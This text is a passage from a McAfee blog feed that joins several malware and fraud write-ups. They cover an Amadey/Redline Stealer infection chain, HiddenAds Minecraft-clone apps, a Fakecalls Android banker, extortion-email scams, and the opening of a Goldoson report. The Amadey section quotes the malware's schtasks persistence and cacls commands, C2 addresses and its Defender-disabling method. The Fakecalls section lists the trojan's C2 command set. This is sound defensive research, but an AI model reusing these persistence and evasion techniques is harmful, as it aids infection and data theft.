Normally, the resource section (.rsrc) contains resources used by the program, such as icons, bitmaps, strings, and dialog boxes. Attackers leverage the resource section of a PE file to improve the success of their attacks by evading detection, enhancing persistence, and adding functionality.
The resource section of this sample has multiples files, out of which CABINET resource holds 75.75% of the total file, which makes the said resource suspicious.
Figure 2: Resources in the file
A CAB (Cabinet) file is a compressed archive file format that is often used to compress and package multiple files into a single file for distribution or installation. A CAB file in the resource section of a PE file can be used for various purposes such as storing additional program files or data, including language-specific resources, or compressing and storing commonly used resources to reduce the size of the executable.
The CABINET holds two executables, cydn.exe and vona.exe.
Figure 3: CABINET in resource section
Likewise, under RCDATA, there is another attribute called “RUNPROGRAM”, which starts cydn.exe. RUNPROGRAM in the resource section of a malware file typically refers to a resource that contains instructions for the malware to execute a specific program or command. When the malware is executed, it will load the resource containing the “RUNPROGRAM” command and attempt to execute the specified program or command. This technique is often used by malware authors to execute additional malicious programs or commands on the infected system. For example, the “RUNPROGRAM” resource may contains instructions to download and execute additional malware, or to launch a malicious script or command that can perform various malicious activities such as stealing sensitive data, creating backdoors, or disabling security software.
Figure 4: RUNPROGRAM attribute stating “cydn.exe”
Like RUNPROGRAM, POSTRUNPROGRAM also holds the instruction to run the executable after RUNPROGRAM is executed. Hence, once cydn.exe is executed, vona.exe will be executed.
Figure 5: POSTRUNPROGRAM stating “vona.exe”
Once WEXTRACT.exe is executed, both cydn.exe and vona.exe is dropped in the TEMP folder. The TEMP folder is a commonly used location for malware to store temporary files and other data, as it is typically writable by any user account and is not usually subject to strict security restrictions. This can make it easier for the malware to operate without raising suspicion or triggering security alerts.
Figure 6: Files dropped in TEMP folder
The file showed high file ratio of the resource section, with the entropy of 7.810. Entropy is a measure of the randomness or unpredictability of the data in the file. It is often used as an indicator of whether a file is likely to be malicious or not.
In the case of a PE file, high entropy can indicate that the file contains a significant amount of compressed or encrypted data, or that it has been obfuscated or packed in a way that makes it more difficult to analyze. This can be a common technique used by malware authors to evade detection by antivirus software.
Figure 7: File ratio and entropy of the resource section
Like the previous file, cydn.exe also had two executables archived in its resource section, named aydx.exe and mika.exe. The “RUNPROGRAM” attribute commands to run aydx.exe and the “POSTRUNPROGRAM” attribute commands to execute mika.exe once aydx.exe is executed. These files are also dropped in TEMP folder.
Figure 8: aydx.exe and mika.exe packed in resource section
Figure 9: Executables dropped in another TEMP folder
The order of file execution is as follows: First, Wextract.exe and cydn.exe, which have already been discussed, are followed by aydx.exe, and then by mika.exe and vona.exe.
Figure 10: Execution flow
Aydx.exe is a 32-bit Portable Executable file, which is 405Kb and is compiled in C/C++. Once executed, it attempts to make a request to IP address: 193.233.20.7.
Figure 11: Malware trying to connect to IPv4
This IP address is linked with Redline Stealer connecting on port number 4138.
Analysis of mika.exe
Mika.exe is 32-bit Portable Executable, complied in .NET and is just 11 KB in size. The original name of the file is “Healer.exe”. This exe file makes no internet activity but does something in the target machine which assists malwares from further stages to carry out their execution.
The intent of mika.exe is to turn off Windows Defender in all possible ways. Once mika.exe was executed, this is how the Defender settings of the system looked like:
Figure 12: Real-time protection turned off
This setting was irreversible and couldn’t be turned back to on via settings of Windows. Following this, logs from Procmon were analyzed and there were entries regarding Windows defender, such as:
Figure 13: Procmon logs
To validate this, Registry was analysed and all the changes were found there. The changes in Registry were found to be in exact order as of Procmon logs. In Windows, the registry is a hierarchical database that stores configuration settings and options for the operating system, as well as for applications and devices. It is used to store information about the hardware, software, user preferences, and system settings on a Windows computer. Following keys are added under Real-Time Protection:
Figure 14: Keys added in Registry
By doing so malware is restricting all the normal users from turning the Windows Defender on. When attackers disable Windows Defender through the registry, the change is likely to persist even if the user or administrator tries to re-enable it through the Windows Defender settings. This allows the attacker to maintain control over the system for a longer period. This supports malwares of further stages to easily execute themselves without any hinderances. This can be leveraged by all the malwares, regardless of their correspondence to this very campaign.
Vona.exe, a variant of the Amadey malware family, is compiled in C/C++ and is 236 KB in size. This is the last file to be executed from the current cluster. When executed, a highly extensive process tree quickly appeared.
Figure 15: Process tree of vona.exe
An immediate child process of vona.exe is mnolyk.exe, another Amadey component, is dropped in a folder in TEMP folder.
Figure 16: mnolyk.exe dropped in TEMP folder
Mnolyk.exe makes active connections to IP addresses 62.204.41.5 and 62.204.41.251
Malicious DLLs are downloaded from 62.204.41.5, which are executed later in the campaign. The target was made to search for two different DLLs, namely cred.dll and clip.dll.
Figure 17: Malicious dlls downloaded
From 62.204.41.251, various exe files are downloaded to the TEMP folder, and later executed. Exes downloaded are:
fuka.exe
Figure 18: fuka.exe
nikas.exe
Figure 19: nikas.exe
igla.exe
Figure 20: igla.exe
nocr.exe
Figure 21: nocr.exe
lebro.exe
Figure 22: lebro.exe
Following the execution of mnolyk.exe, a series of schtasks.exe and cacls.exe were executed.
The command line for schtasks.exe is “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR “C:\Users\test\AppData\Local\Temp\5eb6b96734\mnolyk.exe” /F
So, the entire command line “schtasks.exe /Create /SC MINUTE /MO 1 /TN” would create a scheduled task that runs once every minute. The name of the task specified is the path to mnolyk.exe.
There were several instances of cacls.exe created. One of them is explained here along with its parameter. The command line is “CACLS ”mnolyk.exe” /P “test:R” /E”
So, the entire command line “CACLS mnolyk.exe /P test:R /E” would grant the “test” user or group “Read” permission to the “mnolyk.exe” file. Hence the user “test” can neither write nor delete this file. If in place of “/P test:R”, “/P test:N” was mentioned, which is mentioned in one of the command line, it would give “None” permission to the user.
Fuka.exe
Fukka.exe, a variant of the Redline Stealer malware family, is 175 KB and is compiled in .NET. The original name of the file is Samarium.exe. It shows some network activity with IP 193.233.20.11.
Figure 23: Network activity of fuka.exe
Nikas.exe
Nikas.exe is 248 KB executable file compiled in C/C++. It disables automatic updates for Windows and checks the status of all the sub-fields of Real-Time Protection that were previously changed by mika.exe. No network activity was found during replication.
Igla.exe
Igla.exe is 520 KB file, compiled in C/C++. The original name of the file is WEXTRACT.EXE.MUI. Like we saw in cydn.exe, this PE has also two more exes packed in its resource section, bvPf.exe and cmkmka.exe. Once igla.exe is executed, bvPf.exe is executed, followed by cmkmka.exe.
Figure 24: RUNPROGRAM attribute in igla.exe
Figure 25: POSTRUNPROGRAM attribute in igla.exe
bvPf.exe
bvPf.exe is 306 KB in size and is compiled in C/C++. The original filename is nightskywalker.exe. The file is dropped in a folder in TEMP folder of the system.
The exe has tried connecting to 193.233.20.11, but server did not respond, and no communication took place.
cmkmka.exe
cmkmka.exe is 32-bit PE file, 283.5 KB in size. It further launches AppLaunch.exe which communicates to C2.
It communicates to the IP address: 176.113.115.17 which is an active C2 for Redline Stealer and connects to the port 4132.
Figure 26: Data exfiltration
The blue-colored content in the data indicates the information being transmitted from the Command and Control (C2) server, which is providing instructions to the malware regarding the specific data that needs to be retrieved along with their corresponding paths. These paths include user profiles of different web browsers, various crypto wallet paths, and other related data.
As a response, all the data residing at the specified paths is sent back to the C2 server of the malware. This includes all the profiles of different web browsers, information related to crypto wallets, and even user-related data from the Windows operating system. This process allows the C2 server to collect a vast amount of sensitive information from the infected system, which could be exploited by the attackers for malicious purposes.
Nocr.exe
Nocr.exe, a component of Redline Stealer, is a 175 KB .NET binary. The original name of the file is Alary.exe. It communicates to the IP address 176.113.115.17.
Lebro.exe
Lebro.exe, a component of Amadey, is a 235 KB file, compiled in C/C++. Lebro.exe is responsible for executing nbveek.exe, which is a next stage of the malware. The file is again dropped in TEMP folder.
Figure 27: Dropping another executable in TEMP folder
The hashes of lebro.exe and nbveek.exe are same, they are the same binaries, hence it is Amadey. It is connecting to IP 62.204.41.88.
Figure 28: Network activity of nbveek.exe
The target system executes a php file, and the content of file includes the command to download another exe called setupff.exe. This exe is downloaded to the TEMP folder.
Before setupff.exe is executed, again the series of schtasks.exe and cacls.exe are executed which were seen previously also. The same parameters were passed for nbveek.exe as they were for mnolyk.exe.
Setupff.exe
Setupff.exe is compiled in C/C++ and is 795 KB. The file could not execute and threw Windows error.
Later, another instance of setupff.exe was created which further invokes multiple instances of rundll32.exe. Here, the two dlls downloaded by mnolyk.exe, clip64.dll and cred64.dll, are executed through rundll32.exe. McAfee Labs detects these dlls to be Amadey maware.
The network activity shows the dll to be connecting to 62.204.41.88. This dll again starts exfiltrating data to C2:
Figure 29:Data exfiltration
To conclude, the threat posed by the multi-stage attack that drops the Amadey botnet, and subsequently Redline Stealer, is significant and requires constant vigilance from both consumers and security professionals. By using the Amadey botnet as a delivery mechanism for other malware, attackers can leverage these same capabilities to evade detection and maintain persistence on infected computers. They can use Amadey to drop a wide range of malware, such as spyware, ransomware, and trojans, which can be used for a variety of malicious purposes, such as stealing sensitive information, encrypting files for ransom, or taking control of a computer for use in a larger botnet. Our analysis of various samples of this attack has revealed that the Amadey botnet distributes malware from multiple families and is not restricted to Redline Stealer alone.
At McAfee, we are committed to providing our customers with robust and effective antivirus and anti-malware solutions that can detect and protect against threats like the Amadey botnet and other malware families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats before they can cause damage.
File Type | SHA-256 | Product | Detection |
.exe | 80fed7cd4c7d7cb0c05fe128ced6ab2b9b3d7f03edcf5ef532c8236f00ee7376 | Total Protection and LiveSafe |
Downloader-FCND Lockbit-FSWW PWS-FDON |
.exe | d8e9b2d3afd0eab91f94e1a1a1a0a97aa2974225f4f086a66e76dbf4b705a800 | Total Protection and LiveSafe |
PWS-FDON Lockbit-FSWW |
.exe | 1d51e0964268b35afb43320513ad9837ec6b1c0bd0e56065ead5d99b385967b5 | Total Protection and LiveSafe | Lockbit-FSWW |
.exe | 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 | Total Protection and LiveSafe | PWS-FDON |
.exe | 6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116 | Total Protection and LiveSafe | Downloader-FCND |
.exe | 6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116 | Total Protection and LiveSafe | Downloader-FCND |
.exe | 8020580744f6861a611e99ba17e92751499e4b0f013d66a103fb38c5f256bbb2 | Total Protection and LiveSafe | AgentTesla-FCYU |
.exe | 021ae2fadbc8bc4e83013de03902e6e97c2815ab821adaa58037e562a6b2357b | Total Protection and LiveSafe | Lockbit-FSWW |
.exe | aab1460440bee10e2efec9b5c83ea20ed85e7a17d4ed3b4a19341148255d54b1 | Total Protection and LiveSafe | Lockbit-FSWW |
.exe | 54ce28a037eea87448e65bc25f8d3a38ddd4b4679516cc59899b77150aa46fcc | Total Protection and LiveSafe | GenericRXVK-HF |
.exe | 0cca99711baf600eb030bbfcf279faf74c564084e733df3d9e98bea3e4e2f45f | Total Protection and LiveSafe | AgentTesla-FCYU |
.exe | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b | Total Protection and LiveSafe | Downloader-FCND |
.exe | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b | Total Protection and LiveSafe | Downloader-FCND |
.exe | d40d2bfa9fcbf980f76ce224ab6037ebd2b081cb518fa65b8e208f84bc155e41 | Total Protection and LiveSafe | GenericRXVJ-QP |
.dll | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 | Total Protection and LiveSafe | PWS-FDOE |
.dll | 10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8 | Total Protection and LiveSafe | Trojan-FUUW |
.dll | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 | Total Protection and LiveSafe | Trojan-FUUW |
IPv4 | 193.233.20.7 | ||
IPv4 | 62.204.41.5 | ||
IPv4 | 62.204.41.251 | ||
IPv4 | 193.233.20.11 | ||
IPv4 | 176.113.115.17 | ||
IPv4 | 62.204.41.88 |
The post Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution appeared first on McAfee Blog.
Authored by Dexter Shin
Minecraft is a popular video game that can be played on a desktop or mobile. This is a sandbox game developed by Mojang Studios. Players create and break apart various kinds of blocks in 3-dimensional worlds and they can select to enjoy Survivor Mode to survive in the wild or Creative Mode to focus on being creative.
Minecraft’s popularity has led to many attempts to recreate similar games. As a result, there are so many games with the same concept as Minecraft worldwide. Even on Google Play, we can easily search for similar games. McAfee Mobile Research Team recently discovered 38 games with hidden advertising. These HiddenAds applications discovered on the Google Play Store and installed by at least 35 million users worldwide, have been found to send packets stealthily for advertising revenue in bulk.
McAfee, a member of the App Defense Alliance, focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices, and McAfee Mobile Security detects this threat as Android/HiddenAds.BJL. For more information, and to get fully protected, visit McAfee Mobile Security.
They were officially uploaded to Google Play under various titles and package names. Many games have already been downloaded by users, including apps with 10M+ downloads.
Figure 1. 10M+ downloaded app being one of them
Also, because they can play the game, users can’t notice the large amount of advertising packets being generated on their devices.
Figure 2. Game screen that can be played
After the game is running, the user can play without any problems in the block-based world, only like Minecraft-type games. However, advertisement packets of various domains continuously occur on the device. For example, the four packets shown in the picture are questionable packets generated by the ads libraries of Unity, Supersonic, Google, and AppLovin. Unfortunately, nothing is displayed on the game screen.
Figure 3. Continuous advertising packets
What’s even more interesting is the initial network packets of these games. The structure of the initial packet is very similar. All domains are different. But using 3.txt as the path is equivalent. That is, packets in the form of https://(random).netlify.app/3.txt commonly occur first. The picture below is an example of the first packet extracted from three different apps.
Figure 4. Similarity of the initial packet form
This threat has been detected in various countries around the world. Indicated by our telemetry, the threat has been most prominently detected in the United States, Canada, South Korea, and Brazil.
Figure 5. Users around the world who are widely affected
As we featured in the McAfee 2023 Consumer Mobile Threat Report, one of the most accessible content for young people using mobile devices is games. Malware authors are also aware of this and try to hide their malicious features inside games. Not only is it difficult for general users to find these hidden features, but they can easily trust games from official stores such as Google Play.
We first recommend that users thoroughly review user reviews before downloading applications from the store. And users should install security software on their devices and always keep up to date.
Package Name | Application Name | SHA256 |
GooglePlay
Downloads |
com.good.robo.game.builder.craft.block | Block Box Master Diamond | 300343e701afddbf32bca62916fd717f2af6e8a98fd78cc50d11f1154971d857 | 10M+ |
com.craft.world.fairy.fun.everyday.block | Craft Sword Mini Fun | 72fa914ad3460f9e696ca2264fc899cad20b06b640a7adf8cfe87dd0ea19e137 | 5M+ |
com.skyland.pet.realm.block.rain.craft | Block Box Skyland Sword | d15713467be2f60b2bc548ddb24f202eb64f2aed3fb8801daec14e708f5cee5b | 5M+ |
com.skyland.fun.block.game.monster.craft | Craft Monster Crazy Sword | cadbc904e77feaaf4294d218808f43d50809a87202292e78b0e6a3e164de6851 | 5M+ |
com.monster.craft.block.fun.robo.fairy | Block Pro Forrest Diamond | 08429992bef8259e3011af36ad9d3c2a61b8df384860fd2a007a32a1e4d634af | 1M+ |
com.cliffs.realm.block.craft.rain.vip | Block Game Skyland Forrest | 34ef407f2bedfd8485f6a178f14ee023d395cb9b76ff1754e8733c1fc9ce01fb | 1M+ |
com.block.builder.build.clever.craft.boy | Block Rainbow Sword Dragon | 23aa3cc9481591b524a442fa8df485226e21da9d960dc5792af4ae2a096593d5 | 1M+ |
com.fun.skyland.craft.block.monster.loki | Craft Rainbow Mini Builder | 88fa7de264c5880e65b926df4f75ac6a2900e3718d9d3576207614e20f674068 | 1M+ |
com.skyland.craft.caves.game.monster.block | Block Forrest Tree Crazy | 010c081e5fda58d6508980528efb4f75e572d564ca9b5273db58193c59987abf | 1M+ |
com.box.block.craft.builder.cliffs.build | Craft Clever Monster Castle | 11c5e2124e47380d5a4033c08b2a137612a838bc46f720fba2a8fe75d0cf4224 | 500K+ |
com.block.sun.game.box.build.craft | Block Monster Diamond Dragon | 19ad0dc40772d29f7f39b3a185abe50d0917cacf5f7bdc577839b541f61f7ac0 | 500K+ |
com.builder.craft.diamond.block.clever.robo | Craft World Fun Robo | 746e2f552fda2e2e9966fecf6735ebd5a104296cde7208754e9b80236d13e853 | 500K+ |
com.block.master.boy.craft.cliffs.diamond | Block Pixelart Tree Pro | 25b22e14f0bb79fc6b9994faec984501d0a2bf5573835d411eb8a721a8c2e397 | 500K+ |
com.fun.block.everyday.boy.robo.craft | Craft Mini Lucky Fun | 9fdddf4a77909fd1d302c8f39912a41483634db66d30f89f75b19739eb8471ff | 500K+ |
com.builder.craft.block.sun.game.mini | Block Earth Skyland World | b9284db049c0b641a6b760e7716eb3561e1b6b1f11df8048e9736eb286c2beed | 500K+ |
com.dragon.craft.world.pixelart.block.vip | Block Rainbow Monster Castle | d6984e08465f08e9e39a0cad8da4c1e405b3aa414608a6d0eaa5409e7ed8eac1 | 500K+ |
com.craft.vip.earth.everyday.block.game | Block Fun Rainbow Builder | f3077681623d9ce32dc6a9cbf5d6ab7041297bf2a07c02ee327c730e41927c5f | 500K+ |
com.block.good.mini.craft.box.best | Craft Dragon Diamond Robo | e685fb5a426fe587c3302bbd249f8aa9e152c1de9b170133dfb492ed5552acc9 | 500K+ |
com.lucky.robo.craft.loki.block.good | Block World Tree Monster | 06c3ba10604c38006fd34406edd47373074d57c237c880a19fb8d3f34572417d | 100K+ |
com.caves.robo.craft.dragon.block.earth | Block Diamond Boy Pro | 122406962c303eaeb9839d767835a82ae9d745988deeef4c554e1750a5106cf0 | 100K+ |
com.tree.world.city.block.craft.crazy | Block Lucky Master Earth | e69fe06cb77626be76f2c92ad4229f6eb04c06c73e153d5424386a1309adbd15 | 100K+ |
com.game.skyland.craft.monster.block.best | Craft Forrest Mini Fun | e5fc2e6e3749cb4787a8bc5387ebb7802a2d3f9b408e4d2d07ee800056bb3e16 | 100K+ |
com.everyday.vip.caves.house.block.craft | Craft Sword City Pro | 318165fd8d77a63ca221f5d3ee163e6f2d6df1f2df5c169aca6aca23aef2cf25 | 100K+ |
com.cell.rain.block.craft.loki.fairy | Block Loki Monster Builder | 4f22be2ce64376f046ca180bd9933edcd62fd36f4a7abc39edf194f7170e2534 | 100K+ |
com.block.good.sun.boy.craft.fun | Block Boy Earth Mini | 3b0cf56fb5929d23415259b718af15118c44cf918324cc62c1134bf9bc0f2a00 | 100K+ |
com.fairy.builder.sun.skyland.craft.block | Block Crazy Builder City | 537638903f31e32612bddc79a483cb2c7546966cca64c5becec91d6fc4835e22 | 100K+ |
com.monster.house.good.block.earth.craft | Craft Sword Vip Pixelart | 5f85f020eb8afc768e56167a6d1b75b6d416ecb1ec335d4c1edb6de8f93a3cad | 100K+ |
com.block.best.boy.craft.sword.cell | Block City Fun Diamond | 698544a913cfa5df0b2bb5d818cc0394c653c9884502a84b9dec979f8850b1e7 | 100K+ |
com.crazy.clever.city.block.caves.craft | Craft City Loki Rainbow | ba50dc2d2aeef9220ab5ff8699827bf68bc06caeef1d24cb8d02d00025fcb41c | 100K+ |
com.cliffs.builder.craft.block.lucky.earth | Craft Boy Clever Sun | 77962047b32a44c472b89d9641d7783a3e72c156b60eaaec74df725ffdc4671b | 100K+ |
com.lucky.best.block.game.diamond.craft | Block City Dragon Sun | ac3d0b79903b1e63b449b64276075b337b002bb9a9a9636a47fdd1fb7a0fe368 | 100K+ |
com.build.craft.boy.loki.master.block | Craft Loki Forrest Monster | a2db1eba73d911142134ee127897d5857c521135a8ee768ae172ae2d2ee7b1d4 | 100K+ |
com.build.lokicrafts.master.forest | Lokicraft: Forrest Survival 3D | 0f53996f5e3ec593ed09e55baf1f93d32d891f7d7e58a9bf19594b235d3a8a84 | 50K+ |
com.sun.realm.craft.lucky.dragon.block | Craft Castle Sun Rain | 1e74e73bc29ce1f55740e52250506447b431eb8a4c20dfc75fd118b05ca18674 | 50K+ |
com.block.craft.vip.sun.game.box | Craft Game Earth World | 7483b6a493c0f4f6309e21cc553f112da191b882f96a87bce8d0f54328ac7525 | 50K+ |
com.rain.crazy.lucky.pro.block.craft | Craft Lucky Castle Builder | de5eb8284ed56e91e665d13be459b9a0708fa96549a57e81aa7c11388ebfa535 | 50K+ |
com.JavaKidz.attacksnake | Craftsman: Building City 2022 | e19fcc55ec4729d52dc0f732da02dc5830a2f78ec2b1f37969ee3c7fe16ddb37 | 50K+ |
com.skyland.house.block.craft.crazy.vip | Craft Rainbow Pro Rain | a7675a08a0b960f042a02710def8dd445d9109ca9da795aed8e69a79e014b46f | 50K+ |
The post HiddenAds Spread via Android Gaming Apps on Google Play appeared first on McAfee Blog.
Authored by Dexter Shin
McAfee Mobile Research Team found an Android banking trojan signed with a key used by legitimate apps in South Korea last year. By design, Android requires that all applications must be signed with a key, in other words a keystore, so they can be installed or updated. Because this key can only be used by the developer who created it, an application signed with the same key is assumed to belong to the same developer. That is the case of this Android banking trojan that uses this legitimate signing key to bypass signature-based detection techniques. And these banking trojans weren’t distributed on Google Play or official app stores until now. This threat had been disclosed to the company that owns the legitimate key last year and the company has taken precautions. The company has confirmed that they have replaced the signing key and currently, all their legitimate apps are signed with a new signing key.
While tracking the Android banking trojan Fakecalls we found a sample using the same signing key as a well–known app in Korea. This app is developed by a reputable IT services company with extensive businesses across various sectors, including but not limited to IT, gaming, payment, and advertising. We confirmed that most of the malicious samples using this key pretend to be a banking app as they use the same icon as the real banking apps.
Figure 1. Malware and legitimate app on Google Play
Domains verified last August when we first discovered the samples are now down. However, we investigated URLs related to this malware and we found similar ones related to this threat. Among them, we identified a phishing site that is still alive during our research. The site is also disguised as a banking site.
Figure 2. A phishing page disguised as a Korean banking site
We also found that they updated the domain information of this web page a few days before our investigation.
So we took a deeper look into this domain and we found additional unusual IP addresses that led us to the Command and control(C2) server admin pages used by the cybercriminals to control the infected devices.
Figure 3. Fakecalls Command and control(C2) admin pages
When we check the APK file structure, we can see that this malware uses a packer to avoid analysis and detection. The malicious code is encrypted in one of the files below.
Figure 4. Tencent’s Legu Packer libraries
After decrypting the DEX file, we found some unusual functionality. The code below gets the Android package information from a file with a HTML extension.
Figure 5. Questionable code in the decrypted DEX file
This file is in fact another APK (Android Application) rather than a traditional HTML file designed to be displayed in a web browser.
Figure 6. APK file disguised as an HTML file
When the user launches the malware, it immediately asks for permission to install another app. Then it tries to install an application stored in the “assets” directory as “introduction.html”. The “introduction.html” is an APK file and real malicious behavior happens here.
Figure 7. Dropper asks you to install the main payload
When the dropped payload is about to be installed, it asks for several permissions to access sensitive personal information.
Figure 8. Permissions required by the main malicious application
It also registers several services and receivers to control notifications from the device and to receive commands from a remote Command and Control server.
Figure 9. Services and receivers registered by the main payload
By contrast, the malware uses a legitimate push SDK to receive commands from a remote server. Here are the complete list of commands and their purpose.
Command name | Purpose |
note | sms message upload |
incoming_transfer | caller number upload |
del_phone_record | delete call log |
zhuanyi | set call forwarding with parameter |
clear_note | delete sms message |
assign_zhuanyi | set call forwarding |
file | file upload |
lanjie | block sms message from specified numbers |
allfiles | find all possible files and upload them |
email_send | send email |
record_telephone | call recording on |
inout | re-mapping on C2 server |
blacklist | register as blacklist |
listener_num | no function |
no_listener_num | disable monitoring a specific number |
rebuild | reset and reconnect with C2 |
deleteFile | delete file |
num_address_list | contacts upload |
addContact | add contacts |
all_address_list | call record upload |
deleteContact | delete contacts |
note_intercept | intercept sms message from specified numbers |
intercept_all_phone | intercept sms message from all |
clear_date | delete all file |
clear_phone_contact | delete all contacts |
clear_phone_record | delete all call log |
per_note | quick sms message upload |
soft_name | app name upload |
Cybercriminals are constantly evolving and using new ways to bypass security checks, such as abusing legitimate signing keys. Fortunately, there was no damage to users due to this signing key leak. However, we recommend that users install security software on their devices to respond to these threats. Also, users are recommended to download and use apps from the official app stores.
McAfee Mobile Security detects this threat as Android/Banker regardless of the application, is signed with the previously legitimate signing key.
Indicators of Compromise
SHA256 | Name | Type |
7f4670ae852ec26f890129a4a3d3e95c079f2f289e16f1aa089c86ea7077b3d8 | 신한신청서 | Dropper |
9e7c9b04afe839d1b7d7959ad0092524fd4c6b67d1b6e5c2cb07bb67b8465eda | 신한신청서 | Dropper |
21ec124012faad074ee1881236c6cde7691e3932276af9d59259df707c68f9dc | 신한신청서 | Dropper |
9621d951c8115e1cc4cf7bd1838b8e659c7dea5d338a80e29ca52a8a58812579 | 신한신청서 | Dropper |
60f5deb79791d2e8c2799e9af52adca5df66d1304310d1f185cec9163deb37a2 | 보안인증서 | Banker |
756cffef2dc660a241ed0f52c07134b7ea7419402a89d700dffee4cc6e9d5bb6 | 보안인증서 | Banker |
6634fdaa22db46a6f231c827106485b8572d066498fc0c39bf8e9beb22c028f6 | 보안인증서 | Banker |
52021a13e2cd7bead4f338c8342cc933010478a18dfa4275bf999d2bc777dc6b | 보안인증서 | Banker |
125772aac026d7783b50a2a7e17e65b9256db5c8585324d34b2e066b13fc9e12 | 보안인증서 | Banker |
a320c0815e09138541e9a03c030f30214c4ebaa9106b25d3a20177b5c0ef38b3 | 보안인증서 | Banker |
c7f32890d6d8c3402601743655f4ac2f7390351046f6d454387c874f5c6fe31f | 보안인증서 | Banker |
dbc7a29f6e1e91780916be66c5bdaa609371b026d2a8f9a640563b4a47ceaf92 | 보안인증서 | Banker |
e6c74ef62c0e267d1990d8b4d0a620a7d090bfb38545cc966b5ef5fc8731bc24 | 보안인증서 | Banker |
Domains:
The post Fakecalls Android Malware Abuses Legitimate Signing Key appeared first on McAfee Blog.
Authored by Lakshya Mathur and Sriram P
McAfee Intelligence observed a huge spike in extortion email frauds over the past month. The intent of these fraudulent activities is to intimidate individuals into paying a specified amount of money as a ransom.
Figure 1 shows the number of blackmail emails received over a month recently.
Figure 1 – Stats for 20 February 2023 – 23rd March 2023
In this blog, we’ll delve into frauds that are becoming increasingly common in the digital age. We’ll first define what these frauds are and provide examples to help readers better understand the nature of these frauds. Additionally, we’ll explore how these frauds are on the rise, highlighting the reasons behind this trend and the impact it has on individuals.
Finally, we’ll provide practical advice to help consumers protect themselves from these types of attacks. This will include a discussion of some of the most effective measures individuals can take to safeguard their personal and financial information from fraudsters.
Extortion emails are a type of scam where cybercriminals send threatening messages to individuals or organizations—demanding payment in exchange for not releasing sensitive or embarrassing information. These emails typically claim that the sender has compromising information, such as private photos or personal data, and threaten to share it with the recipient’s friends, family, or the public unless a payment is made. The payment is usually asked in the form of cryptocurrency, such as Bitcoin in the recent spam, which is difficult to trace and can be transferred quickly and anonymously. The goal of these emails is to scare the recipient into paying the demanded amount, even though there might not be any compromising information to release.
Scammers use different scareware sentiments like bad internet browsing habits, hacking for Wi-Fi, and hacking of networks because of hardware vulnerabilities. We’ll now examine various illustrations of extortion emails and analyze scammers’ strategies to intimidate victims into providing payment. By presenting various real-life examples, we can demonstrate how scammers use scareware tactics to manipulate and intimidate their victims into complying with their demands. By instilling fear, the scammers hope to provoke a sense of urgency in the victim, increasing the likelihood that they will pay the demanded ransom.
Figure 2 – Extortion fraud Example 1
Figure 2 is an illustration of a typical extortion email that scammers use to exploit their victims. In this instance, the scammer is claiming to have gained unauthorized access to the victim’s account through a security vulnerability in a Cisco router. The scammer is then threatening to expose embarrassing information about the victim unless a payment of $1,340 is made.
The payment is demanded through a Bitcoin wallet address that the scammer has provided. In this example, the scammer has obfuscated the Bitcoin wallet address by adding spaces between the characters, which is a tactic used to make it harder to track the payment. Now, let us examine another instance of extortion emails.
Figure 3 – Extortion fraud example 2
Figure 3 is another example of an extortion email that scammers use to trick and manipulate their victims. In this case, the attacker is claiming to have gained unauthorized access to the victim’s accounts and has deployed trojans and viruses on the victim’s system. The scammer is also blackmailing the victim by alleging that they have explicit adult content about the victim and the victim’s web browsing history. The purpose of this is to instill fear and provoke a sense of urgency in the victim.
Like the previous example, the scammer has provided a Bitcoin wallet address for the victim to make a ransom payment of $950. Additionally, the attacker has explained that the virus they’ve deployed is undetectable by antivirus software because they’ve used drivers that update the virus every few hours.
Cryptocurrency tools are the most common way these scammers ask for a ransom. They use this tactic because it is difficult to trace and can be sent quickly and anonymously to other platforms. We noticed that scammers were demanding ransom payments through Bitcoin wallets. So, we tried to gather statistics on the number of unique Bitcoin wallets we came across in the past month.
Figure 4 – Unique Bitcoin Stats for 20th February 2023 – 23rd March 2023
We checked these Bitcoin addresses to see what their transactions activities are and their reputation on the blockchain and Bitcoin abuse database. Below are some snapshots of the transaction of these addresses.
Figure 5 – Bitcoin received, and abuse report count for Bitcoin address
As illustrated in Figure 5, it is clear that the Bitcoin addresses mentioned in these extortion emails have numerous abuse reports against them. Additionally, some ransom payments have been received through these addresses. Our intelligence also collected weekly trends on how much money they had within them.
Figure 6 – Total Amount received (US Dollars) in that week
Figure 6 shows that the amount of money received in these Bitcoin addresses is increasing weekly. This implies that scammers are successfully extorting money from more consumers.
If you receive extortion emails, follow the steps outlined below.
Despite advancements in technology, extortion frauds continue to increase as seen in this blog. However, the best defense against such scams is to remain calm, and informed, and to make others aware of such frauds. By following the steps mentioned above, such as not responding to or paying any ransom demands, keeping your system and software updated, using strong passwords, and being wary of unusual emails or links, you can protect yourself from falling victim to these frauds. It is important to stay vigilant and to report any questionable activity to the appropriate authorities. By taking these precautions, you can help prevent yourself and others from becoming victims of extortion fraud.
The post Extortion Fraud is Still on the Rise appeared first on McAfee Blog.
Authored by SangRyol Ryu
McAfee’s Mobile Research Team discovered a software library we’ve named Goldoson, which collects lists of applications installed, and a history of Wi-Fi and Bluetooth devices information, including nearby GPS locations. Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user’s consent. The research team has found more than 60 applications containing this third-party malicious library, with more than 100 million downloads confirmed in the ONE store and Google Play app download markets in South Korea. While the malicious library was made by someone else, not the app developers, the risk to installers of the apps remains.
